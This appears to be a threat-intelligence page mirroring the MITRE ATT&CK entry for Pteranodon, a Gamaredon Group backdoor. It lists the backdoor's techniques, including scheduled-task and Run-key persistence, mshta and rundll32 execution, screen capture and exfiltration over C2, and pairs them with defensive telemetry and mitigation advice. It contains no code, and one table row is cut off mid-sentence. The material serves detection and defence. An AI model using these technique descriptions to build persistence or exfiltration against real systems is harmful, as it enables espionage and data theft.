S0147: Pteranodon
Pteranodon is a custom backdoor used by Gamaredon Group. [1]
Analyst context for executives and security teams
Pteranodon is a Windows backdoor associated in ATT&CK with Gamaredon Group. Its value for defenders is less about a single malware name and more about the behavior cluster ATT&CK links to it: persistence through scheduled tasks and Run keys, execution through command shell, Visual Basic, mshta, and rundll32, web-based command-and-control, local staging, screen capture, tool transfer, exfiltration over C2, and multiple stealth/evasion behaviors. For security leaders, this makes Pteranodon a useful test case for whether Windows endpoint, network, and identity-adjacent monitoring can reconstruct a post-compromise backdoor workflow rather than only alert on a known file hash.
Executive priority
Prioritize this as a coverage validation item for Windows environments, especially where cyber-espionage risk, sensitive document exposure, or Ukraine-related threat intelligence context is relevant. Because ATT&CK provides no official detection guidance for Pteranodon itself, leaders should ask whether existing EDR, SIEM, network monitoring, and incident response playbooks can prove visibility across persistence, scripted execution, living-off-the-land proxy execution, collection, staging, and outbound C2/exfiltration behaviors. This supports business continuity, audit evidence, and IR readiness by showing whether the organization can detect and investigate a backdoor lifecycle even when malware-specific signatures are incomplete.
Technical view
SOC and detection teams should validate behavior-based coverage on Windows for the related techniques: Scheduled Task, Registry Run Keys/Startup Folder, Windows Command Shell, Visual Basic, mshta, rundll32, Native API use, dynamic API resolution, deobfuscation/decoding, virtualization/sandbox evasion, file and directory discovery, screen capture, local data staging, ingress tool transfer, web-protocol C2, exfiltration over C2, and file deletion. The practical exercise is to confirm that endpoint process, registry, task scheduler, file, and network telemetry can be correlated into a timeline showing persistence creation, execution chain, discovery/collection, staging, outbound communications, and cleanup. Treat the Gamaredon Group relationship as threat-intelligence context, not as automatic attribution for any local alert.
Likely telemetry
- Windows process creation telemetry, including parent-child relationships for cmd.exe, mshta.exe, rundll32.exe, script hosts, and scheduled task execution
- Windows Task Scheduler creation, modification, and execution events
- Registry modification telemetry for Run keys and startup persistence locations
- File creation, modification, staging, transfer, and deletion events on endpoints
- Command-line arguments and script content where legally and operationally appropriate
Detection direction
- Build detections around correlated behavior rather than the Pteranodon name alone, because the official ATT&CK object does not provide detection logic.
- Tune for suspicious use of mshta.exe and rundll32.exe in unusual parent-child chains, uncommon paths, script-driven execution, or network-adjacent behavior, while accounting for legitimate administrative and software activity.
- Monitor scheduled task and Run key creation or modification, especially when linked to newly written files, script interpreters, user-writable paths, or external network activity.
- Correlate file and directory discovery, local staging, screen capture indicators, and outbound web traffic to identify possible collection-to-exfiltration sequences.
- Validate visibility into file deletion after execution or staging, since cleanup can remove artifacts needed for IR scoping.
Mitigation priorities
- Harden Windows persistence surfaces by controlling and reviewing scheduled tasks, startup folders, and Run key changes.
- Restrict and monitor living-off-the-land execution paths such as mshta.exe, rundll32.exe, command shell, and Visual Basic/script execution according to business need.
- Apply least privilege so user-context persistence and execution have limited access to sensitive data and administrative functions.
- Improve egress governance by monitoring and controlling outbound web traffic, especially from endpoints and processes that do not normally initiate external connections.
- Ensure endpoint protection and logging preserve enough process, registry, file, and network context for incident response timelines.
Analyst notes and limits
ATT&CK identifies Pteranodon as a custom backdoor used by Gamaredon Group and links it to a broad set of Windows-relevant behaviors. The strongest defensive value is using those relationships to validate layered visibility: endpoint execution, persistence, collection, staging, C2, exfiltration, and anti-analysis behaviors. The related group description provides geopolitical and sector context involving Ukrainian military, law enforcement, judiciary, non-profit, and NGO targeting, but that does not by itself establish exposure or attribution in any specific environment.
The official Pteranodon object does not include ATT&CK tactics, aliases, labels, or detection guidance, and the description is brief. This take is therefore based on the supplied STIX fields, external references, and relationship context only. Local environment data is required to determine actual exposure, prevalence, control coverage, false positives, or incident impact.
Pteranodon
Pteranodon is a custom backdoor used by Gamaredon Group. [1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1113 | Screen Capture | Pteranodon can capture screenshots at a configurable interval.CitationPalo Alto Gamaredon Feb 2017CitationUnit 42 Gamaredon February 2022 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Pteranodon can use `cmd.exe` for execution on victim systems.CitationPalo Alto Gamaredon Feb 2017CitationSymantec Shuckworm January 2022 |
| Enterprise | T1106 | Native API | Pteranodon has used various API calls.CitationMicrosoft Actinium February 2022 |
| Enterprise | T1105 | Ingress Tool Transfer | Pteranodon can download and execute additional files.CitationPalo Alto Gamaredon Feb 2017CitationSymantec Shuckworm January 2022CitationUnit 42 Gamaredon February 2022 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Pteranodon copies itself to the Startup folder to establish persistence.CitationPalo Alto Gamaredon Feb 2017 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Pteranodon can use HTTP for C2.CitationPalo Alto Gamaredon Feb 2017 |
| Enterprise | T1083 | File and Directory Discovery | Pteranodon identifies files matching certain file extension and copies them to subdirectories it created.CitationPalo Alto Gamaredon Feb 2017 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Pteranodon can decrypt encrypted data strings prior to using them.CitationMicrosoft Actinium February 2022 |
| Enterprise | T1027.007 | Dynamic API Resolution Sub-technique | Pteranodon can use a dynamic Windows hashing algorithm to map API components.CitationMicrosoft Actinium February 2022 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Pteranodon can use a malicious VBS file for execution.CitationSymantec Shuckworm January 2022 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Pteranodon executes functions using rundll32.exe.CitationPalo Alto Gamaredon Feb 2017 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Pteranodon exfiltrates screenshot files to its C2 server.CitationPalo Alto Gamaredon Feb 2017 |
| Enterprise | T1070.004 | File Deletion Sub-technique | Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.CitationPalo Alto Gamaredon Feb 2017 |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | Pteranodon creates various subdirectories under |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Pteranodon has the ability to use anti-detection functions to identify sandbox environments.CitationUnit 42 Gamaredon February 2022 |
| Enterprise | T1218.005 | Mshta Sub-technique | Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.CitationSymantec Shuckworm January 2022 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Pteranodon schedules tasks to invoke its components in order to establish persistence.CitationPalo Alto Gamaredon Feb 2017CitationSymantec Shuckworm January 2022 |
Groups, software, and campaigns
G0047: Gamaredon Group
Gamaredon Group is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name Gamaredon Group derives from a misspelling of the word "Armageddon," found in early campaigns.[1][2][3][4][5]
In November 2021, the Ukrainian government publicly attributed Gamaredon Group to Russia’s Federal Security Service (FSB) Center 18, an assessment later supported by multiple independent cybersecurity researchers. [6][5]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 2.1 | Current bundle | 80be6ca8a27f… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Palo Alto Gamaredon Feb 2017
Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
Open source URL -
[2]
Pterodo
(Citation: Symantec Shuckworm January 2022)(Citation: Secureworks IRON TILDEN Profile)
-
[3]
Secureworks IRON TILDEN Profile
Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.
Open source URL -
[4]
Symantec Shuckworm January 2022
Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.
Open source URL -
[5]
mitre-attack S0147Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.